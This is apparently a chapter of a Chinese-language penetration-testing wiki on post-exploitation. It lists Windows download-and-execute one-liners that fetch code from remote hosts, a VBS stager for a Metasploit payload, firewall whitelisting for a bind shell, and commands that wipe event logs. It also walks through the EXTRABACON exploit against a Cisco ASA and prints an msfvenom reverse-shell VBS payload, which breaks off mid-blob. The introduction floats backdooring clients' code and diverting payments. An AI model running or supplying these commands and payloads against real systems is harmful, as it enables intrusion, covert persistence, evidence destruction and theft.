Pentest Wiki Part4 后滲透(一)
后滲透
0x01 前言
后滲透是滲透測試的關鍵組成部分。這就是您將自己與普通黑客區分開來的地方,實際上可以從滲透測試中提供有價值的信息和情報。后滲透針對特定系統,識別關鍵基礎設施,并針對公司最重視的信息或數據,以及它試圖保護的信息或數據。當你滲透一個又一個的系統時,你應該嘗試著展示出那些對業務有最大影響的攻擊。
在后滲透中,進行系統攻擊時,應該花時間確定各個系統的功能以及不同的用戶角色。例如,假設您了解了域基礎架構系統,并以企業管理員身份運行或具有域管理權限。您可能是域管,但怎么與Active Directory通信的系統呢?公司的財務應用程序如何?你能否操控這個系統,然后在下一個支付階段中,把所有的錢從公司轉到別的賬戶上?目標的知識產權如何?
例如,假設您的客戶是一家大型軟件開發商,它將客戶編碼的應用程序發送給客戶以供制造環境使用。你是否會在自己的源代碼加上后門,實質上是讓所有的客戶都受到損害,那會損害他們的品牌可信度。
后滲透是一個棘手的事情,您必須花時間了解哪些信息可供您使用,然后將這些信息哪些又有利于你。攻擊者通常會花費大量的時間在被攻陷的系統上上。像惡意攻擊者一樣思考 - 具有創造性,快速適應,依靠自己的智慧而不是自動化工具。
遠程管理
| Command | Description |
|---|---|
NET USE \\ip\ipc$ password /user:username | 與遠程服務建立一個ipc連接,如果成功,您可以嘗試查看,查詢....具有正確的權限. |
NET USE z: \\ip\share$ password /user:username | 將遠程共享映射為本地驅動器z: |
systeminfo /S ComputerName /U username /P password | 此工具顯示本地或遠程計算機的操作系統配置信息,包括服務包級別. |
tasklist /S SERVER /U DOMAIN\username /P password | 顯示遠程機器上當前正在運行的進程的列表. |
taskkill /S SERVER /U DOMAIN\username /P password | 殺死遠程服務器中的進程. |
| powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/[file]'))" | 從遠程服務器執行代碼. |
| powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')" | 從遠程服務器下載文件. |
| powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File test.ps1 | 本地執行test.ps1 |
bitsadmin /transfer systemrepair /download /priority normal http://path/to/filec:\path\local\file | 創建一個名為systemrepair的工作來從遠程服務器上下載文件. |
echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > wget.vbs<BR><BR>cscript.exe wget.vbs http://ip:port/filename C:\Windows\temp\filename | 用vbs下載文件 |
echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs<BR><BR>cscript.exe %TEMP%\msf.vbs http://ip:port/vbspayload.txt | 下載并執行metasploit vbs payload. |
PsExec.exe \\192.168.206.145 -accepteula -u username -p passwordcmd.exe /c ver | 遠程執行Windows命令,并返回結果 |
wmic /node:SERVER /user:DOMAIN\username /password:password process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt" | 在遠程服務器上創建一個新進程。 沒有命令結果返回. |
PROXY
| Command | Description |
|---|---|
NETSH INTERFACE portproxy add v4tov4 listenport=LPORTconnectaddress=RHOST connectport=RPORT [listenaddress=LHOSTprotocol=tcp] | 將數據從本地端口傳輸到遠程地址的指定端口. |
| set http_proxy=http://your_proxy:your_port<BR>set http_proxy=http://username:password@your_proxy:your_port<BR>set https_proxy=https://your_proxy:your_port<BR>set https_proxy=https://username:password@your_proxy:your_port | 在命令行下使用代理 |
Whitelist-白名單
| Command | Description |
|---|---|
| NETSH FIREWALL show all | 顯示域/標準配置文件的允許的程序配置. |
NETSH FIREWALL add allowedprogramC:\Windows\system32\cmd.exe cmd enable | 在防火墻允許的應用程序白名單中添加一個程序。 |
NETSH FIREWALL delete allowedprogram cmd | 從防火墻allowedprogram Whitelist刪除一個項目,您也可以使用路徑來刪除它. |
| NETSH FIREWALL show all | 顯示域/標準的端口配置. |
NETSH FIREWALL add portopening tcp 4444bindshell enable all | 將tcp端口4444添加到端口白名單中. |
Service
| Command | Description |
|---|---|
sc create servicename type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start servicename | 創建惡意服務,并獲得本地系統特權. |
Scheduler
| Command | Description |
|---|---|
net use \\IP\ipc$ password/user:username<BR>at \\ComputerName time "command" | AT命令安排命令和程序在指定的時間和日期在計算機上運行。net time [/domain]顯示當前時間. |
Logs
| Command | Description |
|---|---|
| del %WINDIR%*.log /a /s /q /f | 從%WINDIR%目錄中刪除所有*.log文件. |
| wevtutil el | 列出系統保存的不同日志文件. |
| for /f %a in ('wevtutil el') do @wevtutil cl "%a" | 清除特定日志的內容. |
| powershell.exe -ep bypass -w hidden -c Clear-Eventlog -Log Application, System, Security | 清除特定的事件日志 |
參考鏈接
- How to execute metasploit vbs payload in cmd.exe ?
- Hacking Windows Active Directory
- How to dump windows 2012 credentials ?
- How to use PowerSploit Invoke-Mimikatz to dump credentials ?
- How to use vssadmin ?
How-to-hack-Cisco-ASA-with-CVE-2016-6366
Cisco ASA - CVE-2016-6366
思科自適應安全設備(ASA)軟件的簡單網絡管理協議(SNMP)代碼中的漏洞可能允許經過身份驗證的遠程攻擊者重新加載受影響的系統或遠程執行代碼。
該漏洞是由于受影響的代碼區域中存在緩沖區溢出。 當在虛擬或物理思科ASA設備上啟用該漏洞時,該漏洞會影響所有版本的SNMP(版本1,2c和3)。 攻擊者可以通過向受影響系統上的啟用SNMP的接口發送精心設計的SNMP數據包來利用此漏洞。 攻擊者可能允許攻擊者執行任意代碼并獲得對系統的完全控制或導致受影響系統的重載。 攻擊者必須知道SNMP字符串才能利用此漏洞。
注意:只有指向受影響系統的流量可用于利用此漏洞。 此漏洞僅影響以路由和透明防火墻模式以及單個或多個上下文模式配置的系統。 此漏洞只能由IPv4流量觸發。 攻擊者需要了解SNMP版本1和SNMP版本2c中配置的SNMP公共字符串或者SNMP版本3的有效用戶名和密碼。
思科發布了解決此漏洞的軟件更新。 此通報的變通辦法部分列出了緩解措施。
如何登錄思科ASA?
如果您對Cisco ASA設備一無所知,請嘗試使用nmap或自定義工具/方法發現有用的東西。
如果啟用snmp,我們可以嘗試使用metasploit**密碼。
msf auxiliary(snmp_login) > set PASSWORD public
PASSWORD => public
msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114
RHOSTS => 192.168.206.114
msf auxiliary(snmp_login) > run
[+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed現在,CVE-2016-6366可以幫助我們滲透遠程cisco設備。
msf auxiliary(cisco_asa_extrabacon) > show options
Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
MODE pass-disable yes Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
RETRIES 1 yes SNMP Retries
RHOST 192.168.206.114 yes The target address
RPORT 161 yes The target port
TIMEOUT 1 yes SNMP Timeout
msf auxiliary(cisco_asa_extrabacon) > run
[*] Building pass-disable payload for version 9.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[!] Don't forget to run pass-enable after logging in!
[*] Auxiliary module execution completed如果成功利用,請嘗試用telnet登錄。 攻擊者可以不用密碼登錄到思科設備。
$ telnet 192.168.206.114
ciscoasa> ?
clear Reset functions
enable Turn on privileged commands
exit Exit from the EXEC
help Interactive help for commands
login Log in as a particular user
logout Exit from the EXEC
no Negate a command or set its defaults
ping Send echo messages
quit Exit from the EXEC
show Show running system information
traceroute Trace route to destination如何檢查思科版本?
ciscoasa> show version
Cisco Adaptive Security Appliance Software Version 9.2(1)
Device Manager Version 7.2(1)
Compiled on Thu 24-Apr-14 12:14 PDT by builders
System image file is "boot:/asa921-smp-k8.bin"
Config file at boot was "startup-config"
ciscoasa up 2 hours 25 mins
Hardware: ASAv, 2048 MB RAM, CPU Pentium II 2793 MHz,
Internal ATA Compact Flash, 256MB
Slot 1: ATA Compact Flash, 8192MB
BIOS Flash Firmware Hub @ 0x1, 0KB
0: Ext: Management0/0 : address is 000c.29a9.88d6, irq 10
1: Ext: GigabitEthernet0/0 : address is 000c.29a9.88e0, irq 5
2: Ext: GigabitEthernet0/1 : address is 000c.29a9.88ea, irq 9
3: Ext: GigabitEthernet0/2 : address is 000c.29a9.88f4, irq 10
ASAv Platform License State: Unlicensed
*Install -587174176 vCPU ASAv platform license for full functionality.
The Running Activation Key is not valid, using default settings:
Licensed features for this platform:
Virtual CPUs : 0 perpetual
Maximum Physical Interfaces : 10 perpetual
Maximum VLANs : 50 perpetual
Inside Hosts : Unlimited perpetual
Failover : Active/Standby perpetual
Encryption-DES : Enabled perpetual
Encryption-3DES-AES : Enabled perpetual
Security Contexts : 0 perpetual
GTP/GPRS : Disabled perpetual
AnyConnect Premium Peers : 2 perpetual
AnyConnect Essentials : Disabled perpetual
Other VPN Peers : 250 perpetual
Total VPN Peers : 250 perpetual
Shared License : Disabled perpetual
AnyConnect for Mobile : Disabled perpetual
AnyConnect for Cisco VPN Phone : Disabled perpetual
Advanced Endpoint Assessment : Disabled perpetual
UC Phone Proxy Sessions : 2 perpetual
Total UC Proxy Sessions : 2 perpetual
Botnet Traffic Filter : Enabled perpetual
Intercompany Media Engine : Disabled perpetual
Cluster : Disabled perpetual
This platform has an ASAv VPN Premium license.
Serial Number: 9ATJDXTHK3B
Running Permanent Activation Key: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
Image type : Release
Key version : A
Configuration last modified by enable_15 at 10:12:25.439 UTC Mon Sep 26 2016如何進入特權模式?
enable可以用來進入思科配置模式。 通常,密碼為空。
ciscoasa> help enable
USAGE:
enable [<priv_level>]
DESCRIPTION:
enable Turn on privileged commands
ciscoasa> enable ?
<0-15> Enter optional privilege level (0-15)
<cr>
ciscoasa> enable
Password:
ciscoasa# configure terminal
ciscoasa(config)# ?
aaa Enable, disable, or view user authentication,
authorization and accounting
aaa-server Configure a AAA server group or a AAA server
access-group Bind an access-list to an interface to filter
traffic
access-list Configure an access control element
arp Change or view ARP table, set ARP timeout
value, view statistics
as-path BGP autonomous system path filter
asdm Configure Device Manager
asp Configure ASP parameters
auth-prompt Customize authentication challenge, reject or
acceptance prompt
auto-update Configure Auto Update
banner Configure login/session banners
bgp-community format for BGP community
boot Set system boot parameters
ca Certification authority
call-home Smart Call-Home Configuration
checkheaps Configure checkheap verification intervals
class-map Configure MPF Class Map
clear Clear
client-update Configure and change client update parameters
clock Configure time-of-day clock
cluster Cluster configuration
command-alias Create command alias
community-list Add a community list entry
compression Configure global Compression parameters
configure Configure using various methods
console Serial console functions
coredump Configure Coredump options
crashinfo Enable/Disable writing crashinfo to flash
crypto Configure IPSec, ISAKMP, Certification
authority, key
ctl-file Configure a ctl-file instance
ctl-provider Configure a CTL Provider instance
cts Cisco Trusted Security commands
ddns Configure dynamic DNS update method
dhcp-client Configure parameters for DHCP client operation
dhcpd Configure DHCP Server
dhcprelay Configure DHCP Relay Agent
dns Add DNS functionality to an interface
dns-group Set the global DNS server group
dns-guard Enforce one DNS response per query
domain-name Change domain name
dynamic-access-policy-record Dynamic Access Policy configuration commands
dynamic-filter Configure Dynamic Filter
dynamic-map Configure crypto dynamic map
enable Configure password for the enable command
end Exit from configure mode
established Allow inbound connections based on established
connections
event Configure event manager
exit Exit from config mode
failover Enable/disable failover feature
filter Enable or disable URL, FTP, HTTPS, Java, and
ActiveX filtering
fips FIPS 140-2 compliance information
firewall Switch to router/transparent mode
fixup Add or delete inspection services
flow-export Configure flow information export through
NetFlow
fragment Configure the IP fragment database
ftp Set FTP mode
ftp-map Configure advanced options for FTP inspection
group-delimiter The delimiter for tunnel-group lookup.
group-policy Configure or remove a group policy
gtp-map Configure advanced options for GTP inspection
h225-map Configure advanced options for H225 inspection
help Interactive help for commands
hostname Change host name of the system
hpm Configure TopN host statistics collection
http Configure http server and https related
commands
http-map This command has been deprecated.
icmp Configure access rules for ICMP traffic
imap4s Configure the imap4s service
interface Select an interface to configure
ip Configure IP address pools
ip Configure IP addresses, address pools, IDS, etc
ipsec Configure transform-set, IPSec SA lifetime and
PMTU Aging reset timer
ipv6 Configure IPv6 address pools
ipv6 Global IPv6 configuration commands
ipv6-vpn-addr-assign Global settings for VPN IP address assignment
policy
isakmp Configure ISAKMP options
jumbo-frame Configure jumbo-frame support
key Create various configuration keys
l2tp Configure Global L2TP Parameters
ldap Configure LDAP Mapping
logging Configure logging levels, recipients and other
options
logout Logoff from config mode
mac-address MAC address options
mac-list Create a mac-list to filter based on MAC
address
management-access Configure management access interface
map Configure crypto map
media-termination Configure a media-termination instance
mgcp-map Configure advanced options for MGCP inspection
migrate Migrate IKEv1 configuration to IKEv2/SSL
monitor-interface Enable or disable failover monitoring on a
specific interface
mount Configure a system mount
mroute Configure static multicast routes
mtu Specify MTU(Maximum Transmission Unit) for an
interface
multicast-routing Enable IP multicast
name Associate a name with an IP address
names Enable/Disable IP address to name mapping
nat Associate a network with a pool of global IP
addresses
no Negate a command or set its defaults
ntp Configure NTP
nve Configure an Network Virtulization Endpoint
(NVE)
object Configure an object
object-group Create an object group for use in
'access-list', etc
object-group-search Enables object group search algorithm
pager Control page length for pagination
passwd Change Telnet console access password
password Configure password encryption
password-policy Configure password policy options
phone-proxy Configure a Phone proxy instance
pim Configure Protocol Independent Multicast
policy-list Define IP Policy list
policy-map Configure MPF Parameter Map
pop3s Configure the pop3s service
prefix-list Build a prefix list
priority-queue Enter sub-command mode to set priority-queue
attributes
privilege Configure privilege levels for commands
prompt Configure session prompt display
quit Exit from config mode
quota Configure quotas
regex Define a regular expression
remote-access Configure SNMP trap threshold for VPN
remote-access sessions
route Configure a static route for an interface
route-map Create route-map or enter route-map
configuration mode
router Enable a routing process
same-security-traffic Enable same security level interfaces to
communicate
scansafe Scansafe configuration
service Configure system services
service-interface service-interface for dynamic interface types
service-policy Configure MPF service policy
setup Pre-configure the system
sla IP Service Level Agreement
smtp-server Configure default SMTP server address to be
used for Email
smtps Configure the smtps service
snmp Configure the SNMP options
snmp-map Configure an snmp-map, to control the operation
of the SNMP inspection
snmp-server Modify SNMP engine parameters
ssh Configure SSH options
ssl Configure SSL options
sunrpc-server Create SUNRPC services table
sysopt Set system functional options
tcp-map Configure advanced options for TCP inspection
telnet Add telnet access to system console or set idle
timeout
terminal Set terminal line parameters
tftp-server Configure default TFTP server address and
directory
threat-detection Show threat detection information
time-range Define time range entries
timeout Configure maximum idle times
tls-proxy Configure a TLS proxy instance or the maximum
sessions
track Object tracking configuration commands
tunnel-group Create and manage the database of connection
specific records for IPSec connections
tunnel-group-map Specify policy by which the tunnel-group name
is derived from the content of a certificate.
uc-ime Configure a Cisco Intercompany Media Engine
(UC-IME) instance
url-block Enable URL pending block buffer and long URL
support
url-cache Enable/Disable URL caching
url-server Configure a URL filtering server
user-identity Configure user-identity firewall
username Configure user authentication local database
virtual Configure address for authentication virtual
servers
vnmc Configure VNMC params
vpdn Configure VPDN feature
vpn Configure VPN parameters.
vpn-addr-assign Global settings for VPN IP address assignment
policy
vpn-sessiondb Configure the VPN Session Manager
vpnsetup Configure VPN Setup Commands
vxlan Configure VXLAN system parameters
wccp Web-Cache Coordination Protocol Commands
webvpn Configure the WebVPN service
xlate Configure an xlate option
zonelabs-integrity ZoneLabs integrity Firewall Server
Configuration如何配置cisco接口?
ciscoasa(config)# interface ?
configure mode commands/options:
GigabitEthernet GigabitEthernet IEEE 802.3z
Management Management interface
Redundant Redundant Interface
TVI Tenant Virtual Interface
vni VNI Interface
<cr>
ciscoasa(config)# interface GigabitEthernet ?
configure mode commands/options:
<0-0> GigabitEthernet interface number
ciscoasa(config)# interface GigabitEthernet 0/?
configure mode commands/options:
<0-2> GigabitEthernet interface number
ciscoasa(config)# interface GigabitEthernet 0/0如何設置IP地址?
ciscoasa(config-if)# ?
Interface configuration commands:
authentication authentication subcommands
ddns Configure dynamic DNS
default Set a command to its defaults
delay Specify interface throughput delay
description Interface specific description
dhcp Configure parameters for DHCP client
dhcprelay Configure DHCP Relay Agent
duplex Configure duplex operation
exit Exit from interface configuration mode
flowcontrol Configure flowcontrol operation
hello-interval Configures EIGRP-IPv4 hello interval
help Interactive help for interface subcommands
hold-time Configures EIGRP-IPv4 hold time
igmp IGMP interface commands
ip Configure the ip address
ipv6 IPv6 interface subcommands
mac-address Assign MAC address to interface
management-only Dedicate an interface to management. Block thru traffic
mfib Interface Specific MFIB Control
multicast Configure multicast routing
nameif Assign name to interface
no Negate a command or set its defaults
ospf OSPF interface commands
pim PIM interface commands
pppoe Configure parameters for PPPoE client
rip Router Information Protocol
security-level Specify the security level of this interface after this
keyword, Eg: 0, 100 etc. The relative security level between
two interfaces determines the way the Adaptive Security
Algorithm is applied. A lower security_level interface is
outside relative to a higher level interface and equivalent
interfaces are outside to each other
shutdown Shutdown the selected interface
speed Configure speed operation
split-horizon Configures EIGRP-IPv4 split-horizon
summary-address Configures EIGRP-IPv4 summary-addressciscoasa(config-if)# ip address ?
interface mode commands/options:
Hostname or A.B.C.D Firewall's network interface address
dhcp Keyword to use DHCP to poll for information. Enables the
DHCP client feature on the specified interface
pppoe Keyword to use PPPoE to poll for information. Enables
the PPPoE client feature on the specified interface
ciscoasa(config)# ip address 192.168.206.114 255.255.255.0
ciscoasa(config-if)# no shutdown
ciscoasa(config-if)# exit
ciscoasa(config)# exit
ciscoasa# ping 192.168.206.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.206.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms如何啟用snmp服務?
ciscoasa# configure terminal
ciscoasa(config)# snmp-server host inside 192.168.206.1 community 0 public如何啟用啟用SSH服務?
ciscoasa# configure terminal
ciscoasa(config)# username admin password password
ciscoasa(config)# aaa authentication ssh console LOCAL
ciscoasa(config)# passwd password
ciscoasa(config)# crypto key generate rsa ?
configure mode commands/options:
general-keys Generate a general purpose RSA key pair for signing and
encryption
label Provide a label
modulus Provide number of modulus bits on the command line
noconfirm Specify this keyword to suppress all interactive prompting.
usage-keys Generate seperate RSA key pairs for signing and encryption
<cr>
ciscoasa(config)# crypto key generate rsa modulus ?
configure mode commands/options:
1024 1024 bits
2048 2048 bits
4096 4096 bits
512 512 bits
768 768 bits
ciscoasa(config)# ssh 192.168.206.1 255.255.255.0 inside
ciscoasa(config)# ssh 192.168.206.137 255.255.255.0 inside
ciscoasa(config)# ssh version 2如何啟用Telnet服務?
ciscoasa# configure terminal
ciscoasa(config)# aaa authentication telnet console LOCAL
ciscoasa(config)# telnet 0.0.0.0 0.0.0.0 inside鏈接
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
- http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-3.firewalls/118075-configure-asa-00.html
- https://github.com/RiskSense-Ops/CVE-2016-6366/
- http://paper.seebug.org/31/
Windows_ActiveDirectory
在cmd shell中執行metasploit vbs payload
如果你是一個pentester/安全研究員,你可能希望從cmd shell獲得meterpreter會話,例如:sqlmap --os-shell或其他工具。例如:
$ ncat -l -p 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\test\Desktop>ver
ver
Microsoft Windows XP [Version 5.1.2600]
C:\Documents and Settings\test\Desktop>在以前,你可能會嘗試下面的方法:
- 將exe轉換成批處理腳本。
- 從遠程服務器下載payload文件(ftp,tftp,http,....)
- ......
現在,我將向您展示如何在cmd.exe中運行metasploit payload。 請嘗試考慮以下問題:
- 如何用msfvenom生成一個payload?
- 如何以簡單/兼容的方式運行payload?
如何用msfvenom生成一個payload?
$ msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.1.100 LPORT=4444 -f vbs --arch x86 --platform win
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of vbs file: 7370 bytes
Function oSpLpsWeU(XwXDDtdR)
urGQiYVn = "" & _
XwXDDtdR & ""
Set gFMdOBBiLZ = CreateObject("MSXML2.DOMDocument.3.0")
gFMdOBBiLZ.LoadXML(urGQiYVn)
oSpLpsWeU = gFMdOBBiLZ.selectsinglenode("B64DECODE").nodeTypedValue
set gFMdOBBiLZ = nothing
End Function
Function skbfzWOqR()
cTENSbYbnWY = "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